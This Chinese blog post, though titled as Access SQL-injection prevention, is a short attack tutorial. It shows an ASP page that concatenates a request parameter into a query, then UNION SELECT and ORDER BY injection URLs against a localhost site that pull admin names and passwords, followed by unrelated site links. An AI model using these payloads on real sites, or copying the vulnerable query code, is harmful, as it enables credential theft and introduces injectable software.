Access安全防范-SQL 注入
- 2017-09-06 08:00:00
- zstmtony 原创
- 4189
SQL注入之access
access三大攻击手法
1.access注入攻击片段-联合查询法
2.access注入攻击片段-逐字猜解法
3.工具类的使用注入
Sql注入产生条件
1.必须有参数传递
2.参数值带入数据库查询并执行
Access注入是暴力猜解
Access数据结构(access只有一个数据库)
Access数据库
表名
列名
数据
该页面asp的sql语句
<%
id=request("id")
sql="select * from product where id="&id
set rs=conn.execute(sql)
%>
1.access注入攻击片段-联合查询法(union)
判断注入
猜解表名
猜解列名
猜解数据
Order by 22 22 代表查询的列名的数目有22个
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误
猜解表名 确定存在admin表名
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
猜解列名 猜解数据
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
表名和列名猜解成功率不是百分百,猜解不到解决办法?
1.字典文件收集(社工)
2.Access偏移注入
- office课程播放地址及课程明细
- Excel Word PPT Access VBA等Office技巧学习平台
- 将( .accdb) 文件格式数据库转换为早期版本(.mdb)的文件格式
- 将早期的数据库文件格式(.mdb)转换为 (.accdb) 文件格式
- KB5002984:配置 Jet Red Database Engine 数据库引擎和访问连接引擎以阻止对远程数据库的访问(remote table)
- Access 365 /Access 2019 数据库中哪些函数功能和属性被沙箱模式阻止(如未启动宏时)
- Access Runtime(运行时)最全的下载(2007 2010 2013 2016 2019 Access 365)
- Activex控件或Dll 在某些电脑无法正常注册的解决办法(regsvr32注册时卡住)
- office使用部分控件时提示“您没有使用该ActiveX控件许可的问题”的解决方法
- RTF文件(富文本格式)的一些解析
- Access树控件(treeview) 64位Office下出现横向滚动条不会自动定位的解决办法
- Access中国树控件 在win10电脑 节点行间距太小的解决办法
- EXCEL 2019 64位版(Office 2019 64位)早就支持64位Treeview 树控件 ListView列表等64位MSCOMMCTL.OCX控件下载
- VBA或VB6调用WebService(直接Post方式)并解析返回的XML
- 早期PB程序连接Sqlserver出现错误
- MMC 不能打开文件C:/Program Files/Microsoft SQL Server/80/Tools/Binn/SQL Server Enterprise Manager.MSC 可能是由于文件不存在,不是一个MMC控制台,或者用后来的MMC版
- sql server连接不了的解决办法
- localhost与127.0.0.1区别
- Roych的浅谈数据库开发系列(Sql Server)
- sqlserver 自动备份对备份目录没有存取权限的解决办法
- 安装Sql server 2005 express 和SQLServer2005 Express版企业管理器 SQLServer2005_SSMSEE
联系人: | 王先生 |
---|---|
Email: | 18449932@qq.com |
QQ: | 18449932 |
微博: | officecn01 |